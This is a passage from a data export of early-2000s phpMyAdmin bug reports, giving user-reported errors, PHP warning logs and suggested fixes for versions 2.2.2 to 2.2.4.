Always great work, I like the phpMyAdmin project!
Original URL https sourceforge.net p phpmyadmin bugs 270 https sourceforge.net p phpmyadmin bugs 270 Original author tobi76 Found in version 2.2.2","bug"
"24444","6640","2.2.2) seeing a table no Select on db.
If a user has Select on a table but not on the whole db, the db name won t show in left frame.
Loic, if you already have a solution for this, please assign the bug to you; if not I will work on it.
Original URL https sourceforge.net p phpmyadmin bugs 271 https sourceforge.net p phpmyadmin bugs 271 Original author lem9","bug"
"24444","6641","File Name Too Long.
I know that there has been a previous report of this but it was being reported on different line numbers Warning stat failed for .
sql.php3?
lang=en amp;amp;server=1 amp;amp;db=numbers amp;amp;table=telstra amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;sql query=SELECT 60ID 60 2C 60tCCA 60 2C 60CallZone 60 2C 60Caller NUM 60 2C 60State 60 FROM 60telstra 60 WHERE 1 AND 60CallZone 60 LIKE 27emerald 25 27 errno=36 File name too long) in var www html phpmyadmin23 tbl replace.php3 on line 231 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin23 tbl replace.php3 231) in var www html phpmyadmin23 tbl replace.php3 on line 240 Thanks Original URL https sourceforge.net p phpmyadmin bugs 272 https sourceforge.net p phpmyadmin bugs 272 Original author anonymous","bug"
"24444","6642","JS error with NS 4.73 on W2000.
Hi I ve tried with Mozilla 4.73 [en] Windows NT 5.0; U) Apache 1.3.20 Win32) PHP 4.0.6 MySQL 3.23.34 and Ive got the following error message JavaScript Error http localhost phpMyAdmin libraries left.js, line 81 firstInd is not defined.
Hope this helps TP Original URL https sourceforge.net p phpmyadmin bugs 273 https sourceforge.net p phpmyadmin bugs 273 Original author anonymous Found in version 2.2.2","bug"
"24444","6643","XP IE6 page says quot;still loading quot;.
Hi all, I have just installed php and mysql on Winodows xp.
I have the latest version of PHP, PHP 4.1.0 and version mysql 3.23.42 win of mysql.
I know php and mysql are working as i have run several php pages and i have changed my mysql password and created a simple db at the command prompt.
I have installed phpmyadmin and followed the configuration instructions.
However the strangest thing happens.
When i go to http localhost phpmyadmin index.php the frames load but then the page sits there saying its still loading but nothing happens.
If however, i press stop and refresh the individual frames they will load ok.
I install Netscape 6.2 and it seems so far to work ok. Must be something with ie6.
Anyway if you have any suggestion please let me know.
Thanks, Jacob Hodges Original URL https sourceforge.net p phpmyadmin bugs 274 https sourceforge.net p phpmyadmin bugs 274 Original author anonymous Found in version 2.2.2","bug"
"24444","6644","Mozilla 0.9.7 Fails to create HTML for Mozilla....
When logging into phpMyAdmin with Mozilla version string Mozilla 5.0 Windows; U; Windows NT 5.0; en US; rv 0.9.7) Gecko 20011221 ) the frames are shown with nothing inside them.
I ve attached an zip with a screenshot, and copies of the html it generated.
Original URL https sourceforge.net p phpmyadmin bugs 275 https sourceforge.net p phpmyadmin bugs 275 Original author utoxin Found in version 2.2.2","bug"
"24444","6645","PHP 4.1.0 Updating a row fails intermittent).
I am trying to update a row in a field with new values, and on submission returns the following Warning Variable passed to reset ) is not an array or object in c \web\default\asdf\tbl replace.php on line 45 Warning Variable passed to reset ) is not an array or object in c \web\default\asdf\tbl replace.php on line 46 Warning Variable passed to each ) is not an array or object in c \web\default\asdf\tbl replace.php on line 148 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\libraries\ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at c \web\default\asdf\tbl replace.php 45) in c \web\default\asdf\header.inc.php on line 29 Error SQL query INSERT INTO ) VALUES ); MySQL said You have an error in your SQL syntax near ) VALUES ) at line 1 Original URL https sourceforge.net p phpmyadmin bugs 276 https sourceforge.net p phpmyadmin bugs 276 Original author c g hills Found in version 2.2.2","bug"
"24444","6646","XP IE6 right frame reloads looping).
Hello!
I am running Apache, mysql 3.23.46 and phpmyadmin 2.2.2 on a Windows XP System.
When I try to view a table with phpMyAdmin in IE6 by clicking the symbol left to the table s name, the page is loaded partly into the right frame.
It s only loaded partly, because after a short time, it s loaded again and then again and again...
So I can never see the complete page in the right frame.
The funny thing about that problem is, when I view phpmyadmin on another browser on the LAN or internet), it works.
An older version of phpmyadmin also works with my IE6.
Can anyone help me?
Original URL https sourceforge.net p phpmyadmin bugs 277 https sourceforge.net p phpmyadmin bugs 277 Original author anonymous Found in version 2.2.2","bug"
"24444","6647","2.2.2) Array error by insert value in set colum.
When I insert values into a column of type set, then an php array message is displayed.
The error message follows.
Warning Variable passed to reset ) is not an array or object in usr local httpd htdocs test phpMyAdmin 2.2.2 tbl replace.php on line 46 The value is inserted correct.
The only error is the display of the php error message.
Original URL https sourceforge.net p phpmyadmin bugs 278 https sourceforge.net p phpmyadmin bugs 278 Original author anonymous Found in version 2.2.2","bug"
"24444","6648","Delete from instead of DROP in russian.
2.2.2 version Language Russian koi8 r Select some tables in central frame checkbox Drop tables see in generated SQl command DELETE FROM.. instead of DROP...
In english version all is OK Original URL https sourceforge.net p phpmyadmin bugs 279 https sourceforge.net p phpmyadmin bugs 279 Original author anonymous","bug"
"24444","6649","Security issues with advanced mode....
I m somehow wondering about the way advanced mode is implemented as I dislike having a user password combo saved on the system that is able to read the complete mysql.
table.
Why does it need to even verificate the passwords?
I mean if you try to establish a connection to the MySQL server using the credentials the user supplied, MySQL will tell you for free whether they are correct or not.
To me, this seems to be a much safer way to authenticate users but maybe I m overlooking something...
Original URL https sourceforge.net p phpmyadmin bugs 280 https sourceforge.net p phpmyadmin bugs 280 Original author anonymous","bug"
"24444","6650","Left frame is all expanded.
Hi I downloaded new 2.2.2) version of phpMyAdmin but now left frame is all expanded with Konqueror 2.2.2) and Opera 5.0 for Linux).
As I have many databases and very many tables in databases there is quite impossible to find needed database table.
Original URL https sourceforge.net p phpmyadmin bugs 281 https sourceforge.net p phpmyadmin bugs 281 Original author raudpats Found in version 2.2.2","bug"
"24444","6651","select bug?.
I try to run a select query by example on a field that has e mail addresses ...
I hit submit and I get the error message amp;quot;You have an error in your SQL syntax near ndscs.nodak.edu LIMIT 0, 30 at line 1 amp;quot; This happens for any e mail address.
This same exact procedure just worked yesterday, using 2.2.1.
I am able to do any other select query by example, without any trouble.
Original URL https sourceforge.net p phpmyadmin bugs 282 https sourceforge.net p phpmyadmin bugs 282 Original author anonymous Found in version 2.2.2","bug"
"24444","6652","Can t update db if it has special chars.
I can t update my db if it has special chars.
I try to use amp;quot;Run SQL query queries on database goajmusiclyricdb db Location of the textfile amp;quot; in order to update it from a .sql file.
But I get the following error displayed at the top in red) note my db is 300kb huge Warning Max file size of 0 bytes exceeded file [sql file] not saved in Unknown on line 0 Warning Cannot add header information headers already sent in select lang.inc.php on line 161 Warning Cannot add header information headers already sent in ob lib.inc.php on line 51 Warning Cannot add header information headers already sent in header.inc.php on line 23 Warning Cannot add header information headers already sent in header.inc.php on line 24 Warning Cannot add header information headers already sent in header.inc.php on line 25 Warning Cannot add header information headers already sent in header.inc.php on line 26 Warning Cannot add header information headers already sent in header.inc.php on line 27 Warning Cannot add header information headers already sent in header.inc.php on line 29 Original URL https sourceforge.net p phpmyadmin bugs 283 https sourceforge.net p phpmyadmin bugs 283 Original author jmmolina","bug"
"24444","6653","Missing German translation.
The line amp;quot;in horizontal vertical) mode and repeat headers after ... cells amp;quot; that appears in v2.2.3 RC1 when displaying SELECT Results is displayed in English although the language ist set to German.
Original URL https sourceforge.net p phpmyadmin bugs 284 https sourceforge.net p phpmyadmin bugs 284 Original author rabus","bug"
"24444","6654","2.2.3 rc1) display tbl.lib.php mistype.
display tbl.lib.php Line 524 amp;lt;td amp;lt;?php echo colspan; ?
amp;gt; amp;quot; align= amp;quot;center amp;quot; amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 285 https sourceforge.net p phpmyadmin bugs 285 Original author yrtimd Found in version 2.2.1","bug"
"24444","6655","Changing Field Definition messes Primary.
I have a table with a definition with UserID and another field.
This other field has a size of 6.
Now I went to change it to 7, but the User who has ID=0 is assigned a new ID during this process.
Is that a bug in MySQL or PHPMyAdmin?
Original URL https sourceforge.net p phpmyadmin bugs 286 https sourceforge.net p phpmyadmin bugs 286 Original author johill Found in version 2.2.1","bug"
"24444","6656","error inserting dumped table.
dumping table with AUTO INCREMENT key one field had value of amp;quot;0 amp;quot; on purpose, when running the dumped data it inserted it with a value of 0, which in turn as a result of AUTO INCREMENT) became amp;quot;6 amp;quot;.
I got a duplicate row error.
To fix this manually is quite easy but tracking the specific row in a DB of 4 5000 records is a major pain.
Original URL https sourceforge.net p phpmyadmin bugs 287 https sourceforge.net p phpmyadmin bugs 287 Original author anonymous","bug"
"24444","6657","2.2.3) undefined variables.
As reported by Steve Alberty, with error reporting E ALL); in config.inc.php3, the various amp;quot;show amp;quot; commands on the main page complain about undefined variables they are in the new vertical mode code.
Original URL https sourceforge.net p phpmyadmin bugs 288 https sourceforge.net p phpmyadmin bugs 288 Original author lem9","bug"
"24444","6658","root cannot change number of rows.
I m using phpMyAdmin 2.2.3, Apache 1.3.20, MySQL 3.23.39 on W2k SP2 When logged in as root, number of rows displayed in query result cannot be changed by typing wanted numbers in text boxes on show query page.
For example There are 11 rows to display.
After changing to amp;quot;Show 5 rows starting from 0 amp;quot;, and click display, all 11 rows are displayed but Showing records says amp;quot;Showing records 0 5 11 total) amp;quot;.
All other users work fine.
Yevgeniy Original URL https sourceforge.net p phpmyadmin bugs 289 https sourceforge.net p phpmyadmin bugs 289 Original author anonymous Found in version 2.2.3","bug"
"24444","6659","2.2.3) Mozilla 0.9.7 select fails?.
OK, have installed v2.2.3 Am using it configured against several servers, The important ones for me are mysql Ver 11.15 Distrib 3.23.41, for redhat linux gnu i386) and mysql Ver 11.12 Distrib 3.23.32, for pc linux gnu i686) If I go to a tables page the one that lists the rows, then has a large SELECT textarea below titled Run SQL query queries on database otc) and change the query from SELECT FROM `tablename` WHERE 1 to SELECT FROM `tablename` WHERE amp;quot;SOME WHERE CLAUSE amp;quot; Then click Go it never returns Mozilla 0.9.7) If I go to that tables SELECT page, and type the where clause exactly the same) into the Add search conditions body of the amp;quot;where amp;quot; clause) field, then the query returns immediately.
Seems a bit odd Original URL https sourceforge.net p phpmyadmin bugs 290 https sourceforge.net p phpmyadmin bugs 290 Original author chrissearle","bug"
"24444","6660","Page doesn t return.
Hello, I m using phpMyAdmin 2.2.3, Apache 1.3.20, MySQL 3.23.39 on W2k SP2, IE 5.50.4807.2300.
PHP Version 4.0.4pl1 After query run and expanding rows Full texts) amp;gt; Edit amp;gt; make some changes or not) amp;gt;save and return checked amp;gt; go = amp;gt; amp;quot;The page cannot be found amp;quot; displayed, but data is being updated.
Root or user account can be used.
Without expanding rows everything works fine.
cfgPmaAbsoluteUri set to exact phpMyAdmin location.
Thank you.
Yevgeniy Original URL https sourceforge.net p phpmyadmin bugs 291 https sourceforge.net p phpmyadmin bugs 291 Original author anonymous","bug"
"24444","6661","script error.
Hi, I installed version 2.2.3 and get a JScript error when I view the content of a table and move the mouse over a field in the HTML table the content is shown in.
I use Microsoft Internet Explorer 5 on a Win2k box.
Obviously the amp;quot;this amp;quot; parameter in the call to the setPointer function is not understood.
Regards Bernhard Doebler Original URL https sourceforge.net p phpmyadmin bugs 292 https sourceforge.net p phpmyadmin bugs 292 Original author anonymous Found in version 2.2.3","bug"
"24444","6662","2.2.3) null ckeckbox is bugus.
Using php 4.06, MySQL 3.23.43, IE6 After upgrading to 2.2.3 It took me hours to figure out that I had to uncheck the NULL box to insert actual data it s not obvious.
I would expect for it to default to null if no data where present, but for the null to overide the actual data during an insert that s bugus annoying feature).
I suggest a minor change either use javascript to change the state of the checkbox, depending on if there s data in the box or, look for the presence real data while building the sql statement.
Original URL https sourceforge.net p phpmyadmin bugs 293 https sourceforge.net p phpmyadmin bugs 293 Original author donnert","bug"
"24444","6663","2.2.3 Page not found.
php 4.06 mysql 3.23.43 Apache 1.3.12 While browsing a table, I pressed delete then ok. then I get a page not found.
The page it was looking for is domain omitted) PhpMyAdmin sql.php?
lang=en amp;amp;server=1 amp;amp;db=tfl amp;amp;table=test amp;amp;pos=0 amp;amp;session max ro ws=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;dontli mitchars= amp;amp;sql query=DELETE FROM 60test 60 WHERE 60c1 60 IS NULL LIMIT 1 amp;amp;zero rows=The row has been deleted amp;amp;g oto=sql.php 3Flang 3Den 26server 3D1 26db 3Dtfl 26table 3Dtest 26pos 3D0 26session max rows 3D30 26disp direction 3Dhorizontal 26repeat cells 3D100 26dontlimitchars 3D 26sql query 3DSELECT 2B 252A 2BFROM 2B 2560test 2560 26zero rows 3DThe 2Brow 2Bhas 2Bbeen 2Bdeleted 26goto 3Dtbl properties.php amp;amp;is js confirmed=1 Original URL https sourceforge.net p phpmyadmin bugs 294 https sourceforge.net p phpmyadmin bugs 294 Original author donnert","bug"
"24444","6664","undefined variables....
Warning Undefined variable edit url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 977 Warning Undefined variable edit str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 978 Warning Undefined variable del url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 982 Warning Undefined variable del str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 987 silver silver Warning Undefined variable edit url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 977 Warning Undefined variable edit str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 978 Warning Undefined variable del url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 982 Warning Undefined variable del str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 987 silver silver Warning Undefined variable edit url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 977 Warning Undefined variable edit str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 978 Warning Undefined variable del url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 982 Warning Undefined variable del str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 987 silver silver Warning Undefined variable edit url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 977 Warning Undefined variable edit str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 978 Warning Undefined variable del url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 982 Warning Undefined variable del str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 987 silver silver Warning Undefined variable edit url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 977 Warning Undefined variable edit str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 978 Warning Undefined variable del url in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 982 Warning Undefined variable del str in D \Personnel\wwwroot\phpmyadmin\libraries\display tbl.l ib.php on line 987 Original URL https sourceforge.net p phpmyadmin bugs 295 https sourceforge.net p phpmyadmin bugs 295 Original author anonymous Found in version 2.2.3","bug"
"24444","6665","unable to select first DB in light mode.
When using the new light mode v2.2.4 CVS), it is not possible to select the first DB directly.
If I tried, nothing would happen, so I have to select another one before that.
I think the problem is that the first DB ist selected by default in the dropdown box.
Now that the amp;quot;Go amp;quot; button is missing this problem gets even bigger o) I only have this problem with IE6.
Netscape 6.2.1 and Opera 6.0 worked fine.
Original URL https sourceforge.net p phpmyadmin bugs 296 https sourceforge.net p phpmyadmin bugs 296 Original author rabus","bug"
"24444","6666","form ?
insert problem.
when i try to edit an old insert, the change does not apear execute every time.
this bug feature) is present on netscape communicator 4.7 fr) amp;amp; ie5.5 fr) on winNT 4.0 fr) Original URL https sourceforge.net p phpmyadmin bugs 297 https sourceforge.net p phpmyadmin bugs 297 Original author anonymous","bug"
"24444","6667","missing quotes in table structure dump.
hi i have a column named amp;quot;from amp;quot; in a table if i ask a dump, here s the output CREATE TABLE digits iddb int 11) NOT NULL auto increment, email varchar 255) NOT NULL default , date timestamp 8) NOT NULL, from varchar 255) default NULL, PRIMARY KEY iddb) ) TYPE=MyISAM; if i execute this query, i get You have an error in your SQL syntax near from varchar 255) default NULL, PRIMARY KEY iddb) ) TYPE=MyISAM at line 5 amp;quot;from amp;quot; should be quoted `from` not to be messed up with the sql syntax amp;quot;select [...] FROM amp;quot; regards Original URL https sourceforge.net p phpmyadmin bugs 298 https sourceforge.net p phpmyadmin bugs 298 Original author nek Found in version 2.2.3","bug"
"24444","6668","bug in join table query.
when I whant to view a result a complex query with joining tables, I see a lot of warnings variable del url not found, variable edit url not found and so on.
Please, check Your code.
Example query select from table1, table2 limit 0,10 Original URL https sourceforge.net p phpmyadmin bugs 299 https sourceforge.net p phpmyadmin bugs 299 Original author anonymous Found in version 2.2.3","bug"
"24444","6669","2.2.3) QBE returns unlimited rows.
QBE does not add LIMIT to the queries.
So results may get huge as all affected rows are displayed.
Original URL https sourceforge.net p phpmyadmin bugs 300 https sourceforge.net p phpmyadmin bugs 300 Original author anonymous Found in version 2.2.3","bug"
"24444","6670","QBE multiple columns with same name.
If I create a query which contains multiple columns with the same name from different tables, phpMySQL will always return the same column.
The query SELECT `diafilme`.`NAME`, `diathema`.`NAME` FROM `dia`, `diafilme`, `diathema` WHERE `diathema`.`Thema` =dia.thema) will return diathema.NAME twice.
Regards, Michael Original URL https sourceforge.net p phpmyadmin bugs 301 https sourceforge.net p phpmyadmin bugs 301 Original author anonymous Found in version 2.2.3","bug"
"24444","6671","2.2.3) Multiple Tables in Print View.
When displaying multiple tables in print view if one table has an overhead, any subsequent tables that dont have an overhead up until the next table with an overhead have the first tables overhead.
ie Database project running on localhost Show tables `pm files`, `pm projectinfo`, `pm projects`, `pm purchases`, `pm slips` pm files [fields] [indexes] Space usage Type Usage Data 32 Bytes Index 4,096 Bytes Total 4,128 Bytes pm projectinfo [fields] [indexes] Space usage Type Usage Data 12,316 Bytes Index 2,048 Bytes Overhead 420 Bytes Effective 13,944 Bytes Total 14,364 Bytes pm projects [fields] [indexes] Space usage Type Usage Data 3,904 Bytes Index 3,072 Bytes Overhead 24 Bytes Effective 6,952 Bytes Total 6,976 Bytes pm purchases [fields] [indexes] Space usage Type Usage Data 536 Bytes Index 2,048 Bytes Overhead 24 Bytes Effective 2,584 Bytes Total 2,584 Bytes pm slips [fields] [indexes] Space usage Type Usage Data 20,420 Bytes Index 5,120 Bytes Overhead 24 Bytes Effective 25,540 Bytes Total 25,540 Bytes Sorry for the length of the example output but in this only pm projectinfo and pm projects have overhead, however pm purchases and pm slips are displaying that they have overhead.
this doesnt affect any of the other calcs attached is a patch to add one line against the cvs 20020120 php3 tarball which as far as i can tell is the latest version of the file in question) Original URL https sourceforge.net p phpmyadmin bugs 302 https sourceforge.net p phpmyadmin bugs 302 Original author fruitcak","bug"
"24444","6672","2.2.3) Cannot add header information.
I just did a clean install of 2.2.3 on a cleanly installed Redhat 7.2 system and am getting the following messages.
I saw a note that indicates the CVS tree may have the problem fixed but I wanted to be sure you knew that 2.2.3 official release isn t working.
I am excited about getting into phpMyAdmin with the 2.2.4 release.
I hear geat things about your work.
Left window Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 libraries ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 45 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 46 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 47 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 48 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 49 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 left.php on line 51 Home Right Window Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 main.php on line 11 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 libraries ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at var www share lib phpMyAdmin 2.2.3 config.inc.php 258) in var www share lib phpMyAdmin 2.2.3 header.inc.php on line 29 Welcome to phpMyAdmin 2.2.3 Original URL https sourceforge.net p phpmyadmin bugs 303 https sourceforge.net p phpmyadmin bugs 303 Original author lynosull Found in version 2.2.3","bug"
"24444","6673","2.2.2) Wrong page back after edit.
From the forum In versions prior to 2.2.3 I could do a Select PhpMyAdmin returns 3 records for example I edit a record PhpMyAdmin returns to the screen with 3 records results of Select) In version 2.2.3 phpMyAdmin returns to the main Table screen after editing a record.
Is this by design?
I tested and 2.2.2 was returning to the results of the select, 2.2.3 and 2.2.4 dev are not.
Original URL https sourceforge.net p phpmyadmin bugs 304 https sourceforge.net p phpmyadmin bugs 304 Original author lem9","bug"
"24444","6674","Double login screen if passwd incorrect.
Hi, Just noticed that phpMyAdmin 2.2.3 opens up more than one login screen in different frames when entering a wrong password that is if the configuration option is as follows cfgServers[1][ auth type ] = cookie ; Using PHP Version 4.0.6 and Apache 1.3.20 on Solaris 2.7 at the server and IE 5.5 as my browser.
Regards, Gustav H Meyer Original URL https sourceforge.net p phpmyadmin bugs 305 https sourceforge.net p phpmyadmin bugs 305 Original author anonymous","bug"
"24444","6675","2.2.3) PMA splitSqlFile ) crashes server.
In line 124 of read dump.php near the end of PMA splitSqlFile) a fake header is sent amp;quot;to bypass browser timeout amp;quot; header Expires 0 ); This header is sent once for every character in a query on larger queries, this can result in hundreds of Expires 0 headers being sent!
I don t know about Apache maybe it filters out duplicate headers generated by an application.
Other servers including mine) don t. This results in responses some browsers can t make any sense of, and in some cases it even crashes the server.
For example, on a Deerfield WebSite server which is Windows based and runs PHP 4.0.6 via the ISAPI interface), using PMA splitSqlFile ) on queries of 1340 or more bytes will crash the server.
Deleting line 124 of read dump.php fixes the problem.
But even if you ignore this crash scenario which is at least partly the server s fault), what sense does sending hundreds of Expires 0 headers really make?
It produces an enormous traffic overhead and some browsers have trouble making sense of all these headers.
Even Internet Explorer sometimes reports that it can t display the page generated by read dump.php.
Isn t there any better way to prevent browser timeouts?
Original URL https sourceforge.net p phpmyadmin bugs 306 https sourceforge.net p phpmyadmin bugs 306 Original author mfichtner Found in version 2.2.3","bug"
"24444","6676","Dump failing, MySQL 3.23.21.
My ISP uses Linux Apache servers MySQL 3.23.21 PhpMyAdmin 2.2.2 I see other problems in your tracking system with dumps but none regarding this.
When I try a dump the table results are corrupt.
I see in build dump.lib.php3 that the version is tested and if amp;gt;= 32321 you use SHOW CREATE TABLE.
If I execute a SHOW CREATE TABLE on separate telnet login it is wrong.
I get an incomplete string and invalid data for defaults.
FYI the results I get are | Teams | create table Teams ClubIndex tinyint 4) unsigned not null default 0 ,TeamIndex int 10) unsigned not null default 0 ,TeamName varchar 50) not null default Boys ,Gender varchar 6) not null default Boys ,Age tinyint 2) unsigned not null default 116 ,Division varchar 16) not null default 2) The default for TeamName and Age are incorrect.
There are also 10 more fields that don t show.
My fix was to bump version check to 32322.
This appears as a MySQL bug.
Any comment?
Know problem?
Another fix?
Original URL https sourceforge.net p phpmyadmin bugs 307 https sourceforge.net p phpmyadmin bugs 307 Original author anonymous","bug"
"24444","6677","2.2.3) incorrect javascript in cookie pass rqst.
at line 216 in file cookie.auth.lib.php the code shoult be changed from var uname = document.forms[ login form ].elements [ pma username ]; var uname = document.forms[ login form ].elements [ pma password ]; if uname.value == ) \{ uname.focus ); \} else \{ pword.focus ); \} to var uname = document.forms[ login form ].elements [ pma username ]; var pword = document.forms[ login form ].elements [ pma password ]; if uname.value == ) \{ uname.focus ); \} else \{ pword.focus ); \} I think the change is obvious and needs no longer explication.
Original URL https sourceforge.net p phpmyadmin bugs 308 https sourceforge.net p phpmyadmin bugs 308 Original author dphantom Found in version 2.2.3","bug"
"24444","6678","javascript failure with longtext .
a new row with a longtext of for example 2 400 chars is not editable or deletable with any browser...
Original URL https sourceforge.net p phpmyadmin bugs 309 https sourceforge.net p phpmyadmin bugs 309 Original author anonymous","bug"
"24444","6679","2.2.4) Create Database link.
The create database link is not being displayed on main.php3.
I am logged in as the mysql root user.
Original URL https sourceforge.net p phpmyadmin bugs 310 https sourceforge.net p phpmyadmin bugs 310 Original author robbat2","bug"
"24444","6680","2.2.2) amp; 2.2.3) Edit row, link problem.
I ve just noticed this.
It seems that if you have a text field with a large amount of data, URL that is created for the edit link in the table browse view unbelievably long becuase it is creating the select statement using data from the whole record.
I ve included a URL that is created on my browse page.
Is there any way to change this behaviour?
For example create the select statement using only the key assuming the table has one).
Otherwise use the amp;quot;every field in the record amp;quot; method that is used now?
phpMyAdmin 2.2.2 and 2.2.3) php 4.1 apache 1.3.14 mysql 3.23.41 linux 2.4.9 13 ie 5.5 i can t see the left pane using NS 4.7) Original URL https sourceforge.net p phpmyadmin bugs 311 https sourceforge.net p phpmyadmin bugs 311 Original author mikegat","bug"
"24444","6681","2.2.3) https to http bug.
For at least a few releases, phpMyAdmin show an incorrect behavior when hosted on a https server when modifying a record, the amp;quot;execute amp;quot; buttons sends to the plain http server, and therefore I get a 404. looking at the source, I found amp;lt;form method= amp;quot;post amp;quot; action= amp;quot;tbl replace.php amp;quot; name= amp;quot;insertForm amp;quot; amp;gt; so I guess it s a bug in Explorer ; maybe a fix could be to explicitly specify the full url.
greg Original URL https sourceforge.net p phpmyadmin bugs 312 https sourceforge.net p phpmyadmin bugs 312 Original author anonymous Found in version 2.2.3","bug"
"24444","6682","read dump.php and data containing .
When using read dump.php in a mysql dump created with tbl dump.php or otherwise), lines containing characters are at least) sometimes treated as comments, even if the character appears in the middle of a data field and the is escaped.
This means that reloading your dump will not always recreate the original table.
Original URL https sourceforge.net p phpmyadmin bugs 314 https sourceforge.net p phpmyadmin bugs 314 Original author anonymous Found in version 2.2.3","bug"
"24444","6683","Problem editing a row.
Problems when edit a row that has a very long field for example when it contains html code) and has special characters.
Row edit URL https XXXXXX.com phpmyadmin tbl change.php?
lang=en amp;amp;server=1 amp;amp;db=XXXXXX amp;amp;table=templates amp;amp;pos=0 amp;amp;sessio n max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=10 0 amp;amp;dontlimitchars= amp;amp;primary key= id 3D 270 27 AND template 3D 27 3C 21DOCTYPE HTML PUBLIC 22 2F 2FW3C 2F 2FDTD HTML 4.0 Transitional 2F 2FEN 22 3E 0D 0A 3Chtml 3E 0D 0A 3Chead 3E 0D 0A 3Ctitle 3E 24boardname 3C 2Ftitle 3E 0D 0A 3Cmeta name 3D 22keywords 22 content 3D 22bbs 2C openbb 2C forum 2C board 2C blazeboard 2C discussion 2C bb2 22 3E 0D 0A 3Cmeta name 3D 22description 22 content 3D 22is a discussion forum powered by OpenBB 22 3E 0D 0A 3Cmeta http equiv 3D 22Content Type 22 content 3D 22text 2Fhtml 3B charset 3Diso 8859 1 22 3E 0D 0A 3Cmeta http equiv 3D 22expires 22 content 3D 22 1 22 3E 0D 0A 3Cmeta http equiv 3D 22Pragma 22 content 3D 22no cache 22 3E 0D 0A 3Cmeta http equiv 3D 22Cache Control 22 content 3D 22no cache 22 3E 0D 0A 3Cmeta http equiv 3D 22MSThemeCompatible 22 content 3D 22Yes 22 3E 0D 0A 3Cstyle type 3D 22text 2Fcss 22 3E 0D 0AINPUT 2C SELECT 2C TEXTAREA 09 09 7B 0D 0A 09BACKGROUND COLOR 3A 24tempvars 5Binputbg 5D 3B 0D 0A 09BORDER LEFT 3A 24tempvars 5Binputborder 5D solid 24tempvars 5Binputbordersize 5D 3B 0D 0A 09BORDER RIGHT 3A 24tempvars 5Binputborder 5D solid 24tempvars 5Binputbordersize 5D 3B 0D 0A 09BORDER TOP 3A 24tempvars 5Binputborder 5D solid 24tempvars 5Binputbordersize 